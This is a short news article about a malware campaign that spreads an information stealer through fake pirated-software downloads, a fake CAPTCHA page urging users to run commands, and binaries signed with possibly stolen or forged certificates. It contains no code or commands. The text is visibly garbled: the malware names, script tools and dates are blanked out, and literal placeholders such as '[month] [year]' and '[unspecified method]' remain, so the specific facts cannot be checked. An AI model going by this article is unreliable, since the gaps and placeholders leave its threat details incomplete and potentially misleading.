Researchers from a French company have discovered a new malicious activity that uses legitimate digital signature certificates for distribution.

Infection Chain Overview The malicious activity, aimed at installing the data-stealing program known as , also referred to as and, first came to light in . It spreads by downloading fake files disguised as pirated software or movies. The newer version of the attack directs users to a fake CAPTCHA page, prompting them to input and execute malicious commands to download the infected archive.

Since mid-month this year, three variants of malicious scripts have been observed. These include scripts that use "." and "." to execute code and download malicious data from remote servers. The archive downloaded by the victim contains legitimate executable files and malicious loaders. The malicious files decrypt and execute encrypted data, aiming to download and launch the second-stage information stealer.

Since [month] [year], attackers have begun using signed binaries instead of [unspecified method] to avoid detection by antivirus programs. Although it is unclear whether all certificates were stolen, experts believe that some of these certificates may have been generated by the attackers. It has been reported that the certificates used to sign the malware have been revoked.

Recent reports also indicate an increase in targeted attacks, which allow infection through the use of a specific malware. This trojan spreads rapidly by creating multiple copies of itself and establishing a backdoor for remote access.

The use of legitimate digital signatures to distribute malware demonstrates that even traditional security methods can become effective tools in the hands of attackers. This underscores the importance of continuously improving cybersecurity and remaining vigilant against any suspicious activities, even those that may appear harmless.